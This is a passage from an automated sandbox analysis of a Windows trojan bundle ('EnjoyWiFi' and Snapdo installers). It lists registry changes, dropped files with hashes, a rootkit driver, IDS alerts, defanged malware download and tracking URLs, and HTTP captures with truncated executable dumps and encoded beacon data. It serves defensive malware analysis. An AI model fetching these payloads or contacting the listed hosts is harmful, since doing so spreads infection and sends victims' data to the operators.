[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process starter.exe:3588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"EnableConsoleTracing" = "0"

The process ytab_m_1_big.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

Dropped PE files

MD5	File path
764b1ff923126715e2b443a3a4c155f7	c:\Program Files\EnjoyWiFi\EnjoyWiFi.exe
6fa4163081ad4a38e405c169ea361ff1	c:\Program Files\EnjoyWiFi\uninst.exe
497648a5cbdd6baba950f93d3f5353fc	c:\Program Files\EnjoyWiFi\wfcrecf.dll
68b4e74c33aaf425c9782f922eb927e9	c:\Program Files\EnjoyWiFi\wftinst.dll
c7d4d685a0af2a09cbc21cb474358595	c:\Program Files\EnjoyWiFi\zlib.dll
007b1d8aef31be74ce6845fe68e1471d	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\SilentInstaller_dotnet4[1].exe
7fb4cfd0b99640776711a458b04a4278	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0af7676060534b0ab7c9dbae31d28aae\Setup.exe
cf6516116ddf26bd15a9142174ffcad7	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\59f124f63a374212b0ef101e658ab10f\enjoyWIFI.exe
ddc3b9ce3e41282fb75474bf45af1808	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\e3b3a628d7fa4f019f25eea6f351c9fd\starter.exe
007b1d8aef31be74ce6845fe68e1471d	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\sdfCF40.exe
0c4eb503e6c1774acb6c5de66aa02d6c	c:\Windows\System32\drivers\wfcre.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\drivers\wfcre.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "%System%\drivers\wfcre.sys" the Trojan controls operations with a system registry by installing the registry notifier.

Propagation

VersionInfo

Company Name:
Product Name: update
Product Version: 1.1.1.1
Legal Copyright:
Legal Trademarks: jdk
Original Filename: kenpachi.exe
Internal Name: kenpachi.exe
File Version: 1.1.1.1
File Description:
Comments: java
Language: English (United Kingdom)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	8192	157956	158208	4.16108	84053e31c2b042290889540f53458d57
.sdata	172032	744	1024	4.08083	310538834e2383082d452e702cef5dcd
.rsrc	180224	57844	57856	4.00892	bac6821e414dfe9c6507016cd1ce0a6d
.reloc	245760	12	512	0.056519	9de9a162f45bd70704546d8224dd9183

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://freegeoip.net/xml/	104.31.10.172
hxxp://room1.360dev.info/black/mirenda/3/default/UA.xml	164.132.203.119
hxxp://room1.360dev.info/black/prisonbreak/3/default.xml	164.132.203.119
hxxp://publishcontroller.cloudapp.net/download/APSnapdoAMRev
hxxp://g5k6t6n2.ssl.hwcdn.net/apdata/installers/auto/exe/starter.exe
hxxp://360devtraking.website/temptrack/Store	94.23.173.69
hxxp://yeawindows.com/enjoyWiFi/enjoyWIFI.exe	128.1.162.234
hxxp://linkury-bumbleb-statisticsservice-westeurope.cloudapp.net/StateStatisticsService.svc/V1/JSON/GetDistributorIdFromNameHttpGet?distributorName=APSnapdoAMRev
hxxp://linkury-webcomponents-westeurope.cloudapp.net/MaxMind.asmx/GetGeoInfo
hxxp://publishcontroller.cloudapp.net/Update/CheckInstallConfig?deviceid=662bd40f-c794-5fc7-424c-6f9ff3eb0b27&distributer=APSnapdoAMRev&channelid=3&barcodeid=50027003&country=UA&encrypt=True
hxxp://linkury-bumbleb-statisticsservice-westeurope.cloudapp.net/StatisticsService.svc/V1/JSON/Lee
hxxp://cs9.wpc.v0cdn.net/apdata/installers/installer/installers-config/snapdo-ap/apsnapdoamrev/ic170817.xml
hxxp://int.dpool.sina.com.cn/iplookup/iplookup.php	180.149.138.197
hxxp://jk.yeawindows.com/reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ5MTJCODE4OUEzRjg1MDAxNEY3OUE5MTZEM0Y0Qzg3RjIxM0Y4NDZGNEQyMzY4NDNDODdDQjlCQkI3QTY3REZENUIyRUNGNDA1NUUxRDMyNkJGQTg5QTUyMDk0MjZGRDRCQjM2QzhCRkJBMDI3OTA0MDM2RjM0Q0ZFRjgxRDgyMjg5MTE4ODg4QUI2MDk5M0U2Q0I4OUY4Q0NFNTY4Q0Q4Qjg3ODRGMUQ5QTAwOUI3OEQ1RjNFRURCQzk0ODUyMjc=	23.234.26.217
hxxp://jk.yeawindows.com/anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ5MTJCODE4OUEzRjg1MDAxNEY3OUE5MTZEM0Y0Qzg3RkUyMTg1RjcyMjdFMjZCNzQyN0Y4NENGNThEQjYyNzM5RDQ0NzJBODA1Q0U2MDFCNjQ3MDk3MThFMkRDOThCOTk=	23.234.26.217
hxxp://djapp.info/?file=bundle
hxxp://d3jx96othz2l8y.cloudfront.net/p.ashx?e=szy0EO73D1jnGREG7sgANyQihONqx/i6WB8r2ztgmWgO7l/wy05vug49NnWHhDotcnP 8TnBr fqiaV62hwPcFU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/zEF4Meyc2 EE8SFHLIEPsMWQZi5gE7wZ	13.32.218.53
hxxp://jk.yeawindows.com/jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ5MTJCODE4OUEzRjg1MDAxNEY3OUE5MTZEM0Y0Qzg3RjlDNzNDRjNENkVDQTIxQjA2OTY3Q0QyODM3REI0NEFGNTNGMzFCQUY5NjA0N0NFQjQxMkNEMjQyQkVCNDVDRTY1NzlBRUNEM0NDOEQwQkI5MzMzMzNBRUI2N0Y2ODU0NTdGODc5NEMwNzBDNjhFODlDNUVEMDlBQzk5N0UyM0Yx	23.234.26.217
hxxp://d3jx96othz2l8y.cloudfront.net/prepreinstaller_win.exe	13.32.218.53
hxxp://132.148.91.227/gib_1_m_baty.exe
hxxp://d3jx96othz2l8y.cloudfront.net/SilentInstaller_dotnet4.exe	13.32.218.53
hxxp://events.fveocylq.net/?p=cHViX2lkPTU0MiZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MzM0JmJpdmVyc2lvbj0xLjgmbWd1aWQ9ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4
hxxp://json.fveocylq.net/?adv_id=334&domain=FVEocYlq.net&event=2&ip=52.1.45.42:80&pub_id=542&offer_version=1.8&dotnet=4&osver=6.1&dwb=iexplore&lang=en&w64=0
hxxp://198.12.157.55/ytab_m_1_big.exe
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8=
hxxp://d3jx96othz2l8y.cloudfront.net/p.ashx?e=8r06TjbI24l2M5d6UDxIvgE57R1EcxVK2 Pir6kA/Pnpk06wDwkeQhgWiv4aOiGv14njVTgsdKDHRTk7/hDhlbb8KFWJm4qaK4BZS xKOahiuhqO3CGckWGvtwf75JlcpMdVCGxZIut/5j8mABQj/LhXuFqCFv7nVTlTA7N8SCd9rpVF7L2m5voso8xPlhHGo8OVPqrD/WaXHlhgkkBVkg==&action=START&actionparam=ARE:8; C:UsersadmAppDataLocalTemp18d11d6bcfa143319d89ee15d7989e1crastub6ab_amobl_inst.exe /S /MAG=AMOBL /SUB=20544	13.32.218.53
hxxp://d3jx96othz2l8y.cloudfront.net/p.ashx?e=r3 8Pyd9F6DAE3Cc4HiKowuL6dbzJjjozsPLTnml9raFClMIXcvfjiAvELRpepitBzKZ50kz8RPTyCp7gBaLmAnbpHOoKgPrbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPugw5PM1v4VCSA/hy5KOoHpcOMdWydF3qmdPbOQmglGcMHVwcwALnkpTzGrd1qaYrT/x86G1gblWOAcscFJ1r9xERphBdJN6GXYjxBRsCc8TDP45Ec68ZTPv0jifF/l6GPdeKAuFl6o0RTlK2jIuC8gitLYy8gIkejZr7qNb0EkX4cxIGDgk1EiHjE41dAxTp/t1gKvH5sVeXr9JcnVpDRrarVcATOywF31SN rk7zZezTxeuxqeK S59it mSQhSNSh45qAmyElt93bQH5bkaM479BnD01mhb3oMX8fofoEbEUK/lLzsEwg5AepPVk5G17OgBc8Iga2q7Gimry 1ppvFWj5nURHQ/2GZlHsaGxkNa/vJW8ChtAyEG6G02p03x5nPU473iN3gFKkc9X20jhsnfr JnqGlF3qCwRqkDTwEu4miNNOz8wBuFrwejlnHLsZG7yf0b3RaiIiCvz98Qb6fXGzh9ihtl8DD8oXlAmQhvbEFx3DbWU=	13.32.218.53
hxxp://d3jx96othz2l8y.cloudfront.net/p.ashx?e=8r06TjbI24l2M5d6UDxIvgE57R1EcxVK2 Pir6kA/Pnpk06wDwkeQhgWiv4aOiGv14njVTgsdKDHRTk7/hDhlbb8KFWJm4qaK4BZS xKOahiuhqO3CGckWGvtwf75JlcpMdVCGxZIut/5j8mABQj/LhXuFqCFv7nVTlTA7N8SCd9rpVF7L2m5voso8xPlhHGo8OVPqrD/WaXHlhgkkBVkg==&action=FINISH&actionparam=ARE:8; C:UsersadmAppDataLocalTemp18d11d6bcfa143319d89ee15d7989e1crastub6ab_amobl_inst.exe /S /MAG=AMOBL /SUB=20544	13.32.218.53
hxxp://cdn.ijnewhb.com/apdata/installers/installer/installers-config/snapdo-ap/apsnapdoamrev/ic170817.xml	93.184.221.200
hxxp://events.fveocylq.nethxxp://events.fveocylq.net/?p=cHViX2lkPTU0MiZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MzM0JmJpdmVyc2lvbj0xLjgmbWd1aWQ9ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4
hxxp://stats.utyuytjn.com/StatisticsService.svc/V1/JSON/Lee	65.52.144.78
hxxp://json.fveocylq.nethxxp://json.fveocylq.net/?adv_id=334&domain=FVEocYlq.net&event=2&ip=52.1.45.42:80&pub_id=542&offer_version=1.8&dotnet=4&osver=6.1&dwb=iexplore&lang=en&w64=0
hxxp://d21m4u3yvwhf8i.cloudfront.net/SilentInstaller_dotnet4.exe	13.32.218.169
hxxp://s2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8=	23.46.123.27
hxxp://www.djapp.info/?file=bundle	52.1.45.42
hxxp://cdn.piytrwd.com/apdata/installers/auto/exe/starter.exe	205.185.208.154
hxxp://madmax.utyuytjn.com/MaxMind.asmx/GetGeoInfo	65.52.153.196
hxxp://updates.utyuytjn.com/Update/CheckInstallConfig?deviceid=662bd40f-c794-5fc7-424c-6f9ff3eb0b27&distributer=APSnapdoAMRev&channelid=3&barcodeid=50027003&country=UA&encrypt=True	52.174.148.190
hxxp://d21m4u3yvwhf8i.cloudfront.net/prepreinstaller_win.exe	13.32.218.169
hxxp://svc-stats.linkury.com/StateStatisticsService.svc/V1/JSON/GetDistributorIdFromNameHttpGet?distributorName=APSnapdoAMRev	65.52.144.78
hxxp://install.rgbcjfir.com/download/APSnapdoAMRev	52.174.148.190
d3mnxqglhhxunq.cloudfront.net	13.32.218.110
d2xkrcja1nf0mp.cloudfront.net	13.32.218.147
d1ees1xrpuhi14.cloudfront.net	13.32.218.86

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Double User-Agent (User-Agent User-Agent)
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY External IP Lookup sina.com.cn
ET POLICY Executable served from Amazon S3
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /prepreinstaller_win.exe HTTP/1.1

Host: d21m4u3yvwhf8i.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 266752

Connection: keep-alive

Date: Fri, 11 Aug 2017 17:37:14 GMT

Last-Modified: Wed, 22 Feb 2017 07:34:34 GMT

ETag: "7fb4cfd0b99640776711a458b04a4278"

Accept-Ranges: bytes

Server: AmazonS3

Age: 65676

X-Cache: Hit from cloudfront

Via: 1.1 e430a35037c484cf19f375480cabfca3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: C3aKYWdyFBU_rrZo7SPEQG4Qzerw291jXcnCfENWSx3GWN5OJnqK4Q==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........f_S..1...1.
..1.......1.......1.......1...J...1...0...1.......1.......1.......1.Ri
ch..1.........................PE..L....>.X.................Z.......
............p....@..........................@............@............
.....................D...<.......T.................................
..............................@............p.. .......................
.....text....Y.......Z.................. ..`.rdata...h...p...j...^....
..........@..@.data...............................@....rsrc...T.......
....................@..@.reloc..X,..........................@..B......
......................................................................
......................................................................
......................................................................
......................................................................
....................................................\qB...h.........V.
...\qB...h...D$..t.V..m.......^..............T$.V....W.F......F......F
...x....@..u. .PR......._..^............V...~..r..F.P.`m.....3..F.....
.F..F.^...........V..3..F......F.....f.N...W.y..f.....f..u. ...Q....._
..^........~..r..F.P..l.....3..F......F.....f.N.............. F....w..
.e..W.~.G...v...e...F.;.s%.N.QW.........vI.....U.n..F.9V.r$..."..u..~.
...r..F......_..F......_.....).~.]9V.r.....8..._................S.\$.U
.l$.VW..9k.s..}e...{..D$. .;.s...;.u.j...W.......Uj....}..._..^][.

<<< skipped >>>

GET /apdata/installers/installer/installers-config/snapdo-ap/apsnapdoamrev/ic170817.xml HTTP/1.1

Host: cdn.ijnewhb.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: no-cache

Content-MD5: usysLlirjb9CcsmmYlN5Zw==

Content-Type: text/text

Date: Tue, 29 Aug 2017 21:57:15 GMT

Etag: 0x8D4E5515B4714EF

Last-Modified: Thu, 17 Aug 2017 09:21:35 GMT

Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0

x-ms-blob-type: BlockBlob

x-ms-lease-status: unlocked

x-ms-request-id: 335a1e7a-0001-000d-3411-212f60000000

x-ms-version: 2009-09-19

Content-Length: 18912

0451172170521482400972540131681420280440702401300140371510261340590491
6705814003723022417509508516823313924109622002600009123912205202619515
0122048224212188161077052176172155067108191251021214178213193203148184
1372420651410160011131292230850851460481940851112401241961270611720460
1702401707211306019500414715515212921920804307522321716206620914614618
7251022064177129160206027116067223162200188025065009028216061177170133
1782242170821171530892301900050270161640630710812180342440500511990800
8218611508012420922203210514101119913900401507615719304918405113212206
1019129173226182194144155199255201218059039035075177136214036192039044
2241080342272051060591152321270951941210701491461361162440091731261620
1913823019121603024824521912313222601613424211224012008911806300423408
6212249061050170094162099177069070037008039081187095080151101197117084
1701750630921611731462391080550260941090670471162402231501270261820721
9417225224523100412804221118017921018722222424209719907212101003903500
4055242070216025238182004062253117241192160116034153215029181191038067
1660120910910212152261632141451370180070841190600161731071242470230771
4617024713802307415719507524523214405703306919203702103101110410512712
6003090054067046170143142060034217142115216193239120047056250028038116
1762200932090021850090342030450930940530421021151960850140871160121920
6517514304508017806425115320211713520411703914806619321714416914214914
5163149133078097178212200098029149154122138242212017193129205077067116
103201207076235152204213059081092044118223170223190043155018138118

<<< skipped >>>

GET /jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ5MTJCODE4OUEzRjg1MDAxNEY3OUE5MTZEM0Y0Qzg3RjlDNzNDRjNENkVDQTIxQjA2OTY3Q0QyODM3REI0NEFGNTNGMzFCQUY5NjA0N0NFQjQxMkNEMjQyQkVCNDVDRTY1NzlBRUNEM0NDOEQwQkI5MzMzMzNBRUI2N0Y2ODU0NTdGODc5NEMwNzBDNjhFODlDNUVEMDlBQzk5N0UyM0Yx HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: jk.yeawindows.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:43 GMT

Connection: close

Content-Length: 0

GET /StateStatisticsService.svc/V1/JSON/GetDistributorIdFromNameHttpGet?distributorName=APSnapdoAMRev HTTP/1.1

Host: svc-stats.linkury.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 13

Content-Type: application/json; charset=utf-8

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:11 GMT

{"d":"50027"}HTTP/1.1 200 OK..Cache-Control: no-cache..Pragma: no-cach
e..Content-Length: 13..Content-Type: application/json; charset=utf-8..
Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X
-Powered-By: ASP.NET..Date: Tue, 29 Aug 2017 21:57:11 GMT..{"d":"50027
"}..

POST /temptrack/Store HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 360devtraking.website

Content-Length: 224

Expect: 100-continue

Accept-Encoding: gzip

HTTP/1.1 100 Continue

....

order="/LsQENRBY8s/42Z7hB2hIbbJOrFHSz783Guu2YFsHqg/jPQP1pu3sTGpb0Hj/e8
DguO5h2QIypjgMLA7XWg5Qgp8Wm5nC3OdADDXpeo1xX9lvwBbusYEF3IIKtjXF8quuck96
qfxr6SS3BFIG4O9JUgsnQtYphoySybiDf7vupPQ1CLl08 v6HAPVb3FUNUn0H0QMBH2rr2
WtSjbPE H8A=="

HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: close

Cache-Control: no-cache

X-RateLimit-Limit: 60

X-RateLimit-Remaining: 59

Date: Tue, 29 Aug 2017 21:57:38 GMT

Content-Encoding: gzip

14........................0..

GET /SilentInstaller_dotnet4.exe HTTP/1.1

Host: d21m4u3yvwhf8i.cloudfront.net


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 321536

Connection: keep-alive

Date: Wed, 09 Aug 2017 17:15:29 GMT

Last-Modified: Tue, 09 Aug 2016 18:36:36 GMT

ETag: "007b1d8aef31be74ce6845fe68e1471d"

Accept-Ranges: bytes

Server: AmazonS3

Age: 23292

X-Cache: Hit from cloudfront

Via: 1.1 3664cc1fd21a07e55327a9c256fa758a.cloudfront.net (CloudFront)

X-Amz-Cf-Id: vrdI7c0XLeqwIWba3r2nt-uKtB3Zwkm908iQ7Fz7AsyVDWEAnldZwA==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......W
............................^.... ........@.. .......................@
............@.....................................W...................
......... ....................................................... ....
........... ..H............text...d.... ...................... ..`.rsr
c...............................@..@.reloc....... ....................
..@..B................@.......H...........hX..........@o..@ ..........
.................................(....*...(....*.0..3.......~.....(...
., (.........(....o....s...........~....*..~....*........*V(....(....~
....o....*..V(....(....~....o....*...0..r............(....(.......(...
.,W.(....o.......(....,B.(.... (...........o......,&.(.....$o.......(.
...,.........o.....*.*...0..q........... d.....(....o....,O.(....o....
,B~.......-o.....X..=o......-o....Y.Yo....o.......=o.....Xo....o......
X....i2.*....0..........~.....~.....o......o....&.*..0..n.......~.....
(....(....t......(....o....(....(......,..~....(....,.~....s ......o!.
....o".... ....o#....o$.....o%...*...0............(.....~&...(....o'..
...(....o(......&...,..o)....(....(*..............(........~........(.
.......~........(.......( ........................~........(..........
..(,...o-...(....(......(......&......*..*.........&..................
.0..(.......(/... ...._..(0...(/... ...._....X3..*.*.0..............(b
...(....,.......[...(1...(2...&*.(....(....(....(3...-.(....(.....<<< skipped >>>

POST /temptrack/Store HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 360devtraking.website

Content-Length: 224

Expect: 100-continue

Accept-Encoding: gzip

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

order="/LsQENRBY8s/42Z7hB2hIbbJOrFHSz783Guu2YFsHqg/jPQP1pu3sTGpb0Hj/e8
DguO5h2QIypjgMLA7XWg5Qowugf4yiepz11dwTzHOeHv nKas3GqVD5RXfKTFCs4xLJI2Z
xzbqjvyDRSpao W9gry8u2qUlmorA7HIPEd15I7F9lLp iZUj3BZkVdDH4aEf8r3 2b9O1
jL1rLzzRT1A=="

HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: close

Cache-Control: no-cache

X-RateLimit-Limit: 60

X-RateLimit-Remaining: 59

Date: Tue, 29 Aug 2017 21:57:06 GMT

Content-Encoding: gzip

14........................0..

GET /?file=bundle HTTP/1.1

Host: VVV.djapp.info

Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Tue, 29 Aug 2017 21:57:38 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Location: hXXp://d21m4u3yvwhf8i.cloudfront.net/prepreinstaller_win.exe

0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Tue, 29 Aug 20
17 21:57:38 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Enco
ding: chunked..Connection: keep-alive..Location: hXXp://d21m4u3yvwhf8i
.cloudfront.net/prepreinstaller_win.exe..0..

GET hXXp://events.fveocylq.net/?p=cHViX2lkPTU0MiZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MzM0JmJpdmVyc2lvbj0xLjgmbWd1aWQ9ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4 HTTP/1.1

Host: events.fveocylq.net

Proxy-Connection: Close


HTTP/1.1 200 OK

Server: nginx

Date: Tue, 29 Aug 2017 21:57:42 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

0..

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 1694

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024078093
0061341211191062391630470432080711072490250652140881271302152211591681
7324404906313115003706817008006601218713421501620719805002713117624001
5043110151162143165039211105202161193205052130108122003140074166047033
0850550490150541512180700381791721472080041810920191112300060702382420
0516403115511223202715315415716111920511324905201323014814515708614716
4241254099073134029113173081069043065018032063180205049080170005001214
1120290691411921360860131100371921111320801420211881410011370892210762
4620507718218419206914211016801316705110302706608102818617007410821815
0004155018116175057022167242043232111222003244139170153187194126205012
1351001781611730250060950090261161650822332430411400381430521322451100
2816908215207002911914314011914220110615816418511319912505523310206104
2216130193176175041213149198128133182027002099007000044246020228117110
0191470022390630280200330070120540212211322492552091010122440510681621
7803610608001907116417721502109104116008118323502813512207608405809725
0153012011146099179217020173083046224158065022253177099212142110183119
1701631890470011352280582300630351101161372301510330622441602411411421
2218710017813210921706623922016714506501606905805000400210225100705225
3088148123099233204198234085215194187090036150127010198041007117239037
124136182254173148117024059155217170192013199221096087157010013036

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:14 GMT

{"d":"OK"}HTTP/1.1 200 OK..Cache-Control: private..Content-Length: 10.
.Content-Type: application/json; charset=utf-8..Server: Microsoft-IIS/
7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Tue, 29
 Aug 2017 21:57:14 GMT..{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 1694

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024078093
0061341211191062391630470432080711072490250652140881271302152211591681
7324404906313115003706817008006601218713421501620719805002713117624001
5043110151162143165039211105202161193205052130108122003140074166047033
0850550490150541512180700381791721472080041810920191112300060702382420
0516403115511223202715315415716111920511324905201323014814515708614716
4241254099073134029113173081069043065018032063180205049080170005001214
1120290691411921360860131100371921111320801420211881410011370892210762
4620507718218419206914211016801316705110302706608102818617007410821815
0004155018116175057022167242043232111222003244139170153187194126205012
1351001781611730250060950090261161650822332430411400381430521322451100
2816908215207002911914314011914220110615816418511319912505523310206104
2216130193176175041213149198128133182027002099007000044246020228117110
0191470022390630280200330070120540212211322492552091010122440510681621
7803610608001907116417721502109104116008118323502813512207608405809725
0153012011146099179217020173083046224158065022253177099212142110183119
1701631890470011352280582300630351101161372301510330622441602411411421
2218710017813210921706623922016714506501606905805000400210225100705225
3088148123099233204198234085215194187090036150127010198041007117239037
124136182254173148117024059155217170192013199221096087157010013036

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:18 GMT

{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 1934

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024010060
0221951810580121350710352371522531262522151410960831490391820320021451
7410816104106415719921613523123402000004810822308209414112608702619618
7167133214067175096186179007048016017195097115089063047142253191197152
1142381870010691990170711902190490190390670260990672170532391542011270
0411417214506412913908324515622325423604311615321618114617506425008003
9222225073247106191208144048101057038136180193084204007152122054047236
0672541161080911742042490781960030370480021742202202140370180501542142
1615701818915402414322016710618920820302415421713325406123413300312708
6226188033132164161088149231216067240023115015024147000196180171068253
0610721830491050460520540780811251841681190580530131341631531102430210
5003304813211503413510709711223324624015409702715810425110919401302607
7194091152105171075239002121110046155015181115137001088129028094163091
1821642302001792071320440190531102420890372182451081470110811492162151
8505313614010024601721611921409912802909203908221618422314113221025302
3005240028112134041180141003243248143079253073219130010164068075004209
1671602450511082361331550131982161501662481970791560030970070061831422
0705417013622200023908000018907119720722325310808321306813219017205601
6176095207232065018027224063141158002241042198200036076211043038245145
065021179181140009186121129016098234121021220137016188181126064044

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:18 GMT

{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 1214

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024168166
2411110850621421692501911820581791812330840592082382010131942482160731
6418505117207912013208816009214905323600701402213710001816108114813104
9009223014179056219130026189227205048115004089212026194230147086075131
1540950452300602232301230740570842361180772271280550441732401020382510
3620901921315004707802919103016905921504809304725217724611517403121019
